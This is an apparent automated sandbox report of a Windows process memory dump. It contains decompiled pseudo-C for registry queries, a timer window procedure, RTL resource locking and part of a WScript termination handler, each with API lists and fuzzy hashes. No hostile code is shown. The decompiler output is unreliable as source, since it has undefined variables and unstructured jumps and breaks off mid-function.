                                                        				void* _v3096;
                                                        				int _v3100;
                                                        				char* _v3104;
                                                        				void* _v3116;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t44;
                                                        				void* _t46;
                                                        				long _t50;
                                                        				int _t53;
                                                        				signed int _t57;
                                                        				int _t65;
                                                        				void* _t74;
                                                        				short* _t75;
                                                        				char* _t76;
                                                        				signed int _t77;
                                                        				int* _t78;
                                                        				intOrPtr _t80;
                                                        				long _t81;
                                                        
                                                        				_t74 = __edx;
                                                        				_t44 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t44 ^ _t77;
                                                        				_t46 = _a4;
                                                        				_t76 = _a12;
                                                        				_t75 = _a8;
                                                        				_v3096 = _t46;
                                                        				_v3104 = _t76;
                                                        				_t80 =  *0xb97001; // 0x0
                                                        				if(_t80 == 0) {
                                                        					if(_t75 == 0) {
                                                        						_v3092 = 0;
                                                        						L20:
                                                        						_t75 = 0x400;
                                                        						_v3088 = 0x400;
                                                        						_t50 = RegQueryValueExA(_v3096, _v3092, 0,  &_v3084,  &_v1032,  &_v3088);
                                                        						if(_t50 != 0) {
                                                        							L2:
                                                        							if(_t81 > 0) {
                                                        								_t50 = _t50 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							L4:
                                                        							return E00B81335(_t50, 0, _v8 ^ _t77, _t74, _t75, _t76);
                                                        						}
                                                        						_t53 = _v3088;
                                                        						if(_t53 != 0) {
                                                        							 *((char*)(_t77 + _t53 - 0x405)) = 0;
                                                        							if(_v3084 == 1 || _v3084 == 2) {
                                                        								if(MultiByteToWideChar(0, 0,  &_v1032, 0xffffffff,  &_v3080, _t75) == 0) {
                                                        									L17:
                                                        									_t50 = GetLastError();
                                                        									goto L2;
                                                        								}
                                                        								_t57 = _v3096;
                                                        								goto L6;
                                                        							} else {
                                                        								_t57 =  &_v1032;
                                                        								L6:
                                                        								if(_v3084 <= 0) {
                                                        									L14:
                                                        									_t50 = 0x80040153;
                                                        									goto L4;
                                                        								}
                                                        								if(_v3084 > 2) {
                                                        									if(_v3084 != 4 || _v3088 != 4) {
                                                        										goto L14;
                                                        									} else {
                                                        										 *_t76 = _t57 & 0xffffff00 |  *_t57 != 0x00000000;
                                                        										L12:
                                                        										_t50 = 0;
                                                        										goto L4;
                                                        									}
                                                        								}
                                                        								 *_t76 = 1;
                                                        								if(E00B82753( &_v3080, "0", 0xffffffff) == 0 || E00B82753( &_v3080, L"no", 0xffffffff) == 0 || E00B82753( &_v3080, L"false", 0xffffffff) == 0) {
                                                        									 *_t76 = 0;
                                                        								} else {
                                                        									 *_t76 = 1;
                                                        								}
                                                        								goto L12;
                                                        							}
                                                        						}
                                                        						_t50 = 0x80004005;
                                                        						goto L4;
                                                        					}
                                                        					_t76 = WideCharToMultiByte;
                                                        					_t65 = WideCharToMultiByte(0, 0, _t75, 0xffffffff, 0, 0, 0, 0);
                                                        					_v3100 = _t65;
                                                        					if(_t65 != 0) {
                                                        						E00B8320B(_t65);
                                                        						_v3092 = _t78;
                                                        						if(WideCharToMultiByte(0, 0, _t75, 0xffffffff, _v3092, _v3100, 0, 0) == 0) {
                                                        							goto L17;
                                                        						}
                                                        						_t76 = _v3104;
                                                        						goto L20;
                                                        					}
                                                        					goto L17;
                                                        				}
                                                        				_v3088 = 0x400;
                                                        				_t50 = RegQueryValueExW(_t46, _t75, 0,  &_v3084,  &_v3080,  &_v3088);
                                                        				_t81 = _t50;
                                                        				if(_t81 == 0) {
                                                        					_t57 =  &_v3080;
                                                        					goto L6;
                                                        				}
                                                        				goto L2;
                                                        			}






























                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B8331B
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00020019,?,00000000), ref: 00B89861
                                                        • GetLastError.KERNEL32 ref: 00B8986D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiQueryValueWide
                                                        • String ID: false
                                                        • API String ID: 2926610503-734881840
                                                        • Opcode ID: 7a53f0731d66d947f09ecdd4436e8ac21e94ac81ae0c69ef627b124595ebbe96
                                                        • Instruction ID: d7e915aad46ccacfa2ffbdc8f79965c7f1492444ea238631516a180d7763e895
                                                        • Opcode Fuzzy Hash: 7a53f0731d66d947f09ecdd4436e8ac21e94ac81ae0c69ef627b124595ebbe96
                                                        • Instruction Fuzzy Hash: 5A5181B190412AEEEF24AF58CD80EAA77FCEB05354F1446E9E115A61A1DF309E84CF24
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 93%
                                                        			E00B8413D(void* __edx, void* _a4, short* _a8, char* _a12) {
                                                        				signed int _v8;
                                                        				int _v12;
                                                        				int* _v16;
                                                        				int _v20;
                                                        				void* _v32;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t23;
                                                        				signed int _t27;
                                                        				void* _t38;
                                                        				int _t39;
                                                        				void* _t40;
                                                        				signed int _t41;
                                                        				int* _t42;
                                                        				intOrPtr _t44;
                                                        				signed int _t45;
                                                        
                                                        				_t38 = __edx;
                                                        				_t23 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t23 ^ _t41;
                                                        				_v12 = 4;
                                                        				_t44 =  *0xb97001; // 0x0
                                                        				if(_t44 == 0) {
                                                        					if(_a8 == 0) {
                                                        						_v16 = 0;
                                                        						L12:
                                                        						_t27 = RegQueryValueExA(_a4, _v16, 0,  &_v20, _a12,  &_v12);
                                                        						goto L2;
                                                        					}
                                                        					_t40 = WideCharToMultiByte;
                                                        					_t39 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                        					if(_t39 != 0) {
                                                        						E00B8320B(_t30);
                                                        						_v16 = _t42;
                                                        						if(WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v16, _t39, 0, 0) == 0) {
                                                        							goto L8;
                                                        						}
                                                        						goto L12;
                                                        					}
                                                        					L8:
                                                        					_t27 = GetLastError();
                                                        					goto L3;
                                                        				} else {
                                                        					_t27 = RegQueryValueExW(_a4, _a8, 0,  &_v20, _a12,  &_v12);
                                                        					L2:
                                                        					_t45 = _t27;
                                                        					if(_t45 == 0) {
                                                        						if(_v20 != 4 || _v12 != 4) {
                                                        							_t27 = 0x80040153;
                                                        						} else {
                                                        							_t27 = 0;
                                                        						}
                                                        						L5:
                                                        						return E00B81335(_t27, 0, _v8 ^ _t41, _t38, _t39, _t40);
                                                        					}
                                                        					L3:
                                                        					if(_t45 > 0) {
                                                        						_t27 = _t27 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					goto L5;
                                                        				}
                                                        			}





















                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000004,00B82238,00000000,00B82218,00B82218,00000004), ref: 00B84179
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00000000,00000000,00000000,00000000,UseWINSAFER,TrustPolicy,00000000,00B82218,00B82238), ref: 00B897DB
                                                        • GetLastError.KERNEL32 ref: 00B897E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiQueryValueWide
                                                        • String ID: TrustPolicy$UseWINSAFER
                                                        • API String ID: 2926610503-599510279
                                                        • Opcode ID: 515a314c7ef857315bc6d230b91af42369c3d3ae9ff6ca1012874b01b5518a2e
                                                        • Instruction ID: 67a7b04cfaa3241cd1518b467e7c05eff2fd341560b096de060042d90bfbcf70
                                                        • Opcode Fuzzy Hash: 515a314c7ef857315bc6d230b91af42369c3d3ae9ff6ca1012874b01b5518a2e
                                                        • Instruction Fuzzy Hash: EC214B7690410EBF9F10AF948C84DBE7FBDEB15394B1484AAF522A6060DB358E54DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _errno$_write$_fileno_isatty_lseeki64
                                                        • String ID:
                                                        • API String ID: 3920760039-0
                                                        • Opcode ID: 8207ac199d74a0e49a07cb04085454da8c126d3a565ce807975d61c4bc9a4dac
                                                        • Instruction ID: 2f98114033431b3f3428fd350c3742bae618323bf94fc4545eb57928ebd8472e
                                                        • Opcode Fuzzy Hash: 8207ac199d74a0e49a07cb04085454da8c126d3a565ce807975d61c4bc9a4dac
                                                        • Instruction Fuzzy Hash: 0F41A271401605DFD720AF2DC8899667BE4FF45321B14CAA8F8BA9B6B1D734E941CB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B81DDB(struct HWND__** __ecx, void* __edi, int _a4, signed int _a8, long _a12) {
                                                        				int _t25;
                                                        				void* _t27;
                                                        				void* _t31;
                                                        				void* _t32;
                                                        				void* _t33;
                                                        				void* _t35;
                                                        				int _t36;
                                                        				int _t40;
                                                        				int _t42;
                                                        				int _t45;
                                                        				int _t46;
                                                        
                                                        				_t25 = _a4;
                                                        				_t53 = __ecx;
                                                        				if(_t25 == 0) {
                                                        					PostQuitMessage(0);
                                                        					L10:
                                                        					return 0;
                                                        				}
                                                        				_t27 = _t25 - 0xf;
                                                        				if(_t27 == 0) {
                                                        					__eflags = _a12;
                                                        					if(__eflags == 0) {
                                                        						E00B863A9(__ecx[2], __eflags, 0x8004fffc);
                                                        					}
                                                        					return 1;
                                                        				}
                                                        				_t31 = _t27 - 5;
                                                        				if(_t31 == 0) {
                                                        					goto L10;
                                                        				}
                                                        				_t32 = _t31 - 0x6c;
                                                        				if(_t32 == 0) {
                                                        					 *__ecx =  *__ecx & 0x00000000;
                                                        					goto L10;
                                                        				}
                                                        				_t33 = _t32 - 0x91;
                                                        				if(_t33 == 0) {
                                                        					E00B8FCE1(__ecx);
                                                        					goto L10;
                                                        				}
                                                        				_t35 = _t33 - 0x2ee;
                                                        				if(_t35 == 0) {
                                                        					_t36 = __ecx[1];
                                                        					__eflags = _t36;
                                                        					if(_t36 != 0) {
                                                        						_t42 = KillTimer( *__ecx, _t36);
                                                        						__eflags = _t42;
                                                        						if(_t42 != 0) {
                                                        							_t13 =  &(_t53[3]);
                                                        							 *_t13 = _t53[3] & 0x00000000;
                                                        							__eflags =  *_t13;
                                                        						} else {
                                                        							_t53[3] = GetLastError();
                                                        						}
                                                        					}
                                                        					__eflags = _a8 - 1;
                                                        					if(_a8 >= 1) {
                                                        						_t40 = SetTimer( *_t53, 0x19771215, _a8 * 0x3e8, 0);
                                                        						_t53[1] = _t40;
                                                        						__eflags = _t40;
                                                        						if(_t40 != 0) {
                                                        							_t19 =  &(_t53[3]);
                                                        							 *_t19 = _t53[3] & 0x00000000;
                                                        							__eflags =  *_t19;
                                                        						} else {
                                                        							_t53[3] = GetLastError();
                                                        						}
                                                        					}
                                                        					L7:
                                                        					return DefWindowProcA( *_t53, _a4, _a8, _a12);
                                                        				}
                                                        				if(_t35 == 1) {
                                                        					_t45 = __ecx[1];
                                                        					__eflags = _t45;
                                                        					if(_t45 != 0) {
                                                        						_t46 = KillTimer( *__ecx, _t45);
                                                        						__eflags = _t46;
                                                        						if(_t46 != 0) {
                                                        							_t53[1] = _t53[1] & 0x00000000;
                                                        							_t53[3] = _t53[3] & 0x00000000;
                                                        						} else {
                                                        							_t53[3] = GetLastError();
                                                        						}
                                                        					}
                                                        					goto L10;
                                                        				}
                                                        				goto L7;
                                                        			}















                                                        APIs
                                                        • DefWindowProcA.USER32(00000000,?,00000081,?,00000000,?,00B81DCF,00000081,?,?), ref: 00B81E31
                                                        • PostQuitMessage.USER32 ref: 00B85B98
                                                        • KillTimer.USER32 ref: 00B884D3
                                                        • GetLastError.KERNEL32(?,00B81DCF,00000081,?,?), ref: 00B884DD
                                                        • SetTimer.USER32(00000000,19771215,00000001,00000000), ref: 00B88501
                                                        • GetLastError.KERNEL32(?,00B81DCF,00000081,?,?), ref: 00B8850E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLastTimer$KillMessagePostProcQuitWindow
                                                        • String ID:
                                                        • API String ID: 2265161093-0
                                                        • Opcode ID: f8b4a5f451a9193f3c10ffd0b38b3f3ae74d9bdef0319d23cba45879350d11f9
                                                        • Instruction ID: 6805019e391dfe92c1bba791755795e8078af0dd0cb46e7f2d1ea650c591cba5
                                                        • Opcode Fuzzy Hash: f8b4a5f451a9193f3c10ffd0b38b3f3ae74d9bdef0319d23cba45879350d11f9
                                                        • Instruction Fuzzy Hash: 28317C36100A06DFDB307F2ADC48BA5B7E8EF283A2F54886AE956C2570DB74D900DF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$AllocFree$freemalloc
                                                        • String ID:
                                                        • API String ID: 945414394-0
                                                        • Opcode ID: fe2d85a2922837271d9fde6ee1833442a8c4ac38b5fdd82f48e8a4ca7e3de771
                                                        • Instruction ID: ece867dc944ff4b6c7b5545d308d199bbc95c551194bb074a1614d18fd9b2b01
                                                        • Opcode Fuzzy Hash: fe2d85a2922837271d9fde6ee1833442a8c4ac38b5fdd82f48e8a4ca7e3de771
                                                        • Instruction Fuzzy Hash: 5E117375A00B06BBDB21AF3AEC40A4BBBE9EF44760B158579F814D7261DB30D811CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$AllocFree$freemalloc
                                                        • String ID:
                                                        • API String ID: 945414394-0
                                                        • Opcode ID: 49025a73e2c264e102f248ac16fee5ca78beb8edcbb301dbaa5205a52ff6d594
                                                        • Instruction ID: 896c225446a85b2187c86dec0b2165828727c2e4d2aa1eaf2da2c5f5e18ab5cd
                                                        • Opcode Fuzzy Hash: 49025a73e2c264e102f248ac16fee5ca78beb8edcbb301dbaa5205a52ff6d594
                                                        • Instruction Fuzzy Hash: C4115E36A01706BBDB20AF3ADC40A5BB7E8EF447607108979F854D7260DB30D811CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 49%
                                                        			E02310554(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int* _t49;
                                                        				signed int _t51;
                                                        				signed int _t56;
                                                        				signed int _t58;
                                                        				signed int _t61;
                                                        				signed int _t63;
                                                        				void* _t66;
                                                        				intOrPtr _t67;
                                                        				signed int _t70;
                                                        				void* _t75;
                                                        				signed int _t81;
                                                        				signed int _t84;
                                                        				void* _t86;
                                                        				signed int _t93;
                                                        				signed int _t96;
                                                        				intOrPtr _t105;
                                                        				signed int _t107;
                                                        				void* _t110;
                                                        				signed int _t115;
                                                        				signed int* _t119;
                                                        				void* _t125;
                                                        				void* _t126;
                                                        				signed int _t128;
                                                        				signed int _t130;
                                                        				signed int _t138;
                                                        				signed int _t144;
                                                        				void* _t158;
                                                        				void* _t159;
                                                        				void* _t160;
                                                        
                                                        				_t96 = _a4;
                                                        				_t115 =  *(_t96 + 0x28);
                                                        				_push(_t138);
                                                        				if(_t115 < 0) {
                                                        					_t105 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                        						goto L6;
                                                        					} else {
                                                        						__eflags = _t115 | 0xffffffff;
                                                        						asm("lock xadd [eax], edx");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L6:
                                                        					_push(_t128);
                                                        					while(1) {
                                                        						L7:
                                                        						__eflags = _t115;
                                                        						if(_t115 >= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        							_t49 = _t96 + 0x1c;
                                                        							_t106 = 1;
                                                        							asm("lock xadd [edx], ecx");
                                                        							_t115 =  *(_t96 + 0x28);
                                                        							__eflags = _t115;
                                                        							if(_t115 < 0) {
                                                        								L23:
                                                        								_t130 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023b01c0;
                                                        									_push(_t144);
                                                        									_push(0);
                                                        									_t51 = E022CF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                        									__eflags = _t51 - 0x102;
                                                        									if(_t51 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t106 =  *(_t144 + 4);
                                                        									_t126 =  *_t144;
                                                        									_t86 = E02314FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                        									_push(_t126);
                                                        									_push(_t86);
                                                        									E02323F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                        									E02323F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        									_t130 = _t130 + 1;
                                                        									_t160 = _t158 + 0x28;
                                                        									__eflags = _t130 - 2;
                                                        									if(__eflags > 0) {
                                                        										E0235217A(_t106, __eflags, _t96);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									E02323F92();
                                                        									_t158 = _t160 + 0xc;
                                                        								}
                                                        								__eflags = _t51;
                                                        								if(__eflags < 0) {
                                                        									_push(_t51);
                                                        									E02313915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                        									asm("int3");
                                                        									while(1) {
                                                        										L32:
                                                        										__eflags = _a8;
                                                        										if(_a8 == 0) {
                                                        											break;
                                                        										}
                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        										_t119 = _t96 + 0x24;
                                                        										_t107 = 1;
                                                        										asm("lock xadd [eax], ecx");
                                                        										_t56 =  *(_t96 + 0x28);
                                                        										_a4 = _t56;
                                                        										__eflags = _t56;
                                                        										if(_t56 != 0) {
                                                        											L40:
                                                        											_t128 = 0;
                                                        											__eflags = 0;
                                                        											while(1) {
                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                        												asm("sbb esi, esi");
                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023b01c0;
                                                        												_push(_t138);
                                                        												_push(0);
                                                        												_t58 = E022CF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                        												__eflags = _t58 - 0x102;
                                                        												if(_t58 != 0x102) {
                                                        													break;
                                                        												}
                                                        												_t107 =  *(_t138 + 4);
                                                        												_t125 =  *_t138;
                                                        												_t75 = E02314FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                        												_push(_t125);
                                                        												_push(_t75);
                                                        												E02323F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                        												E02323F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        												_t128 = _t128 + 1;
                                                        												_t159 = _t158 + 0x28;
                                                        												__eflags = _t128 - 2;
                                                        												if(__eflags > 0) {
                                                        													E0235217A(_t107, __eflags, _t96);
                                                        												}
                                                        												_push("RTL: Re-Waiting\n");
                                                        												_push(0);
                                                        												_push(0x65);
                                                        												E02323F92();
                                                        												_t158 = _t159 + 0xc;
                                                        											}
                                                        											__eflags = _t58;
                                                        											if(__eflags < 0) {
                                                        												_push(_t58);
                                                        												E02313915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                        												asm("int3");
                                                        												_t61 =  *_t107;
                                                        												 *_t107 = 0;
                                                        												__eflags = _t61;
                                                        												if(_t61 == 0) {
                                                        													L1:
                                                        													_t63 = E022F5384(_t138 + 0x24);
                                                        													if(_t63 != 0) {
                                                        														goto L52;
                                                        													} else {
                                                        														goto L2;
                                                        													}
                                                        												} else {
                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                        													_push( &_a4);
                                                        													_push(_t61);
                                                        													_t70 = E022CF970( *((intOrPtr*)(_t138 + 0x18)));
                                                        													__eflags = _t70;
                                                        													if(__eflags >= 0) {
                                                        														goto L1;
                                                        													} else {
                                                        														_push(_t70);
                                                        														E02313915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                        														L52:
                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                        														_push( &_a4);
                                                        														_push(1);
                                                        														_t63 = E022CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                        														__eflags = _t63;
                                                        														if(__eflags >= 0) {
                                                        															L2:
                                                        															return _t63;
                                                        														} else {
                                                        															_push(_t63);
                                                        															E02313915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                        															_push( &_a4);
                                                        															_push(1);
                                                        															_t63 = E022CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                        															__eflags = _t63;
                                                        															if(__eflags >= 0) {
                                                        																goto L2;
                                                        															} else {
                                                        																_push(_t63);
                                                        																_t66 = E02313915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                        																asm("int3");
                                                        																while(1) {
                                                        																	_t110 = _t66;
                                                        																	__eflags = _t66 - 1;
                                                        																	if(_t66 != 1) {
                                                        																		break;
                                                        																	}
                                                        																	_t128 = _t128 | 0xffffffff;
                                                        																	_t66 = _t110;
                                                        																	asm("lock cmpxchg [ebx], edi");
                                                        																	__eflags = _t66 - _t110;
                                                        																	if(_t66 != _t110) {
                                                        																		continue;
                                                        																	} else {
                                                        																		_t67 =  *[fs:0x18];
                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                        																		return _t67;
                                                        																	}
                                                        																	goto L58;
                                                        																}
                                                        																E022F5329(_t110, _t138);
                                                        																return E022F53A5(_t138, 1);
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												_t56 =  *(_t96 + 0x28);
                                                        												goto L3;
                                                        											}
                                                        										} else {
                                                        											_t107 =  *_t119;
                                                        											__eflags = _t107;
                                                        											if(__eflags > 0) {
                                                        												while(1) {
                                                        													_t81 = _t107;
                                                        													asm("lock cmpxchg [edi], esi");
                                                        													__eflags = _t81 - _t107;
                                                        													if(_t81 == _t107) {
                                                        														break;
                                                        													}
                                                        													_t107 = _t81;
                                                        													__eflags = _t81;
                                                        													if(_t81 > 0) {
                                                        														continue;
                                                        													}
                                                        													break;
                                                        												}
                                                        												_t56 = _a4;
                                                        												__eflags = _t107;
                                                        											}
                                                        											if(__eflags != 0) {
                                                        												while(1) {
                                                        													L3:
                                                        													__eflags = _t56;
                                                        													if(_t56 != 0) {
                                                        														goto L32;
                                                        													}
                                                        													_t107 = _t107 | 0xffffffff;
                                                        													_t56 = 0;
                                                        													asm("lock cmpxchg [edx], ecx");
                                                        													__eflags = 0;
                                                        													if(0 != 0) {
                                                        														continue;
                                                        													} else {
                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        														return 1;
                                                        													}
                                                        													goto L58;
                                                        												}
                                                        												continue;
                                                        											} else {
                                                        												goto L40;
                                                        											}
                                                        										}
                                                        										goto L58;
                                                        									}
                                                        									__eflags = 0;
                                                        									return 0;
                                                        								} else {
                                                        									_t115 =  *(_t96 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t106 =  *_t49;
                                                        								__eflags = _t106;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t93 = _t106;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t93 - _t106;
                                                        										if(_t93 == _t106) {
                                                        											break;
                                                        										}
                                                        										_t106 = _t93;
                                                        										__eflags = _t93;
                                                        										if(_t93 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									__eflags = _t106;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L23;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L58;
                                                        					}
                                                        					_t84 = _t115;
                                                        					asm("lock cmpxchg [esi], ecx");
                                                        					__eflags = _t84 - _t115;
                                                        					if(_t84 != _t115) {
                                                        						_t115 = _t84;
                                                        						goto L7;
                                                        					} else {
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L58:
                                                        			}




































                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02332206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 2a2c8082897d0f5b1e2c738def6be0aa7cc4c6f28f8047bf5d5ac8aca22e6d47
                                                        • Instruction ID: 04c4a6c6eca4db8565af43762eff299516e833653a4f632d4ab8fa3cfb127409
                                                        • Opcode Fuzzy Hash: 2a2c8082897d0f5b1e2c738def6be0aa7cc4c6f28f8047bf5d5ac8aca22e6d47
                                                        • Instruction Fuzzy Hash: F3514B717103116FEB29CE18DC81FA733AAAF84720F218269FD55DB285DA71ED42CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 67%
                                                        			E00B86481(signed int _a4, intOrPtr* _a8) {
                                                        				signed int _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				void* _v20;
                                                        				signed int _v24;
                                                        				void* _v28;
                                                        				char* _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				signed int _v44;
                                                        				signed int _v48;
                                                        				void* _v52;
                                                        				long _v56;
                                                        				intOrPtr _v72;
                                                        				signed int _v76;
                                                        				intOrPtr _v80;
                                                        				char _v84;
                                                        				void* _t68;
                                                        				signed int _t70;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t81;
                                                        				intOrPtr* _t83;
                                                        				signed int _t84;
                                                        				signed int _t87;
                                                        				signed int _t92;
                                                        				intOrPtr _t95;
                                                        				long _t103;
                                                        				intOrPtr* _t122;
                                                        				signed int _t123;
                                                        				signed int _t125;
                                                        				intOrPtr* _t127;
                                                        
                                                        				_t122 = _a8;
                                                        				_v16 = 0;
                                                        				_v20 = 0;
                                                        				_v8 = 0;
                                                        				_t68 =  *((intOrPtr*)( *_t122 + 0xc))(_t122,  &_v84);
                                                        				if(_t68 < 0) {
                                                        					return _t68;
                                                        				}
                                                        				_t125 = _a4;
                                                        				if(E00B86529( *((intOrPtr*)(_t125 + 0x2c))) == 0) {
                                                        					_t70 = 0x80004005;
                                                        					L7:
                                                        					return _t70;
                                                        				}
                                                        				_t103 = _v56;
                                                        				if(_t103 == 0x8004fffc) {
                                                        					__eflags =  *(_t125 + 0x51);
                                                        					if( *(_t125 + 0x51) == 0) {
                                                        						 *(_t125 + 0x51) = 1;
                                                        						_t123 = E00B90A12(_t125);
                                                        						__eflags = _t123;
                                                        						if(_t123 < 0) {
                                                        							L5:
                                                        							_t127 = __imp__#6;
                                                        							 *_t127(_v80);
                                                        							 *_t127(_v76);
                                                        							 *_t127(_v72);
                                                        							 *_t127(_v8);
                                                        							 *_t127(_v20);
                                                        							_t77 = _v16;
                                                        							if(_t77 != 0) {
                                                        								 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                        							}
                                                        							_t70 = _t123;
                                                        							goto L7;
                                                        						}
                                                        						_t123 = E00B90A52(_t125, 0,  &_v16);
                                                        						__eflags = _t123;
                                                        						if(_t123 < 0) {
                                                        							goto L5;
                                                        						}
                                                        						_t81 = _v16;
                                                        						_v28 = 0;
                                                        						_v32 = L"WScript_OnScriptTerminate";
